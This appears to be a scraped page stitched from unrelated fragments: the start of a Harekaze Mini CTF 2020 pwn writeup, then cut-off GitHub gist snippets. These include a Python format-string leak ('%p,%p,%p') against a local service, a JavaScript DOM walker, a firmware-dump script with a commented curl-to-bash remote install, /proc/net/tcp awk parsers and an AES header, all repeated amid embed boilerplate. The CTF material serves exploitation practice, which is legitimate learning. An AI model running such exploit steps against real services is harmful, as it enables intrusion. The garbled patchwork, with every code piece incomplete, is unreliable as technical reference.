Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.
I played Harekaze Mini CTF 2020 for about 3 hours this weekend. The pwn challenges were nice (I especially enjoyed nm-game-extreme
). Here are some short writeups.
The program just tells you to provide shellcode that will execute execve("/bin/sh", NULL, NULL)
. It gives you the address of the "/bin/sh" string, so you just create shellcode to do the job and send it:
#!/usr/bin/env python3
from pwn import *
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import struct | |
import socket | |
s = socket.socket() | |
s.connect(('127.0.0.1', 1337)) | |
r = s.recv(1024) | |
s.send("%p,%p,%p\n") | |
while ',' not in r: | |
r = s.recv(1024) | |
start_buf = int(r.split(',')[1], 16)-9 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function walk(node) { | |
// I stole this function from here: | |
// http://is.gd/mwZp7E | |
var child, next; | |
var tagName = node.tagName ? node.tagName.toLowerCase() : ""; | |
if (tagName == 'input' || tagName == 'textarea') { | |
return; | |
} |
An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent Libssh bug.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# this tool will automate firmware extraction and unpacking using FT232R-type adaptors (like BusPirate) and a SOIC clip placed on a chip to dump | |
# install the necessary software: | |
#$ sudo apt install flashrom binwalk || echo 'git clone?' | |
# pump up binwalk with additional packages and libraries | |
#$ bash <(curl -s https://raw.githubusercontent.com/devttys0/binwalk/master/deps.sh) | |
# place the clip on the chip, connect it to the adaptor, which sould be connected to your PC (with drivers installed) and launch the script: | |
# chip => clip => adaptor => PC => script |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Gawk version | |
# Remote | |
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}' | |
# Local | |
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}' | |
# No Gawk | |
# Local | |
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# -*- coding: utf-8 -*- | |
# | |
# (c) 2020 Bernd Busse | |
# | |
"""Implementation of AES as used by https://aesencryption.net.""" | |
import base64 | |
import sys |
NewerOlder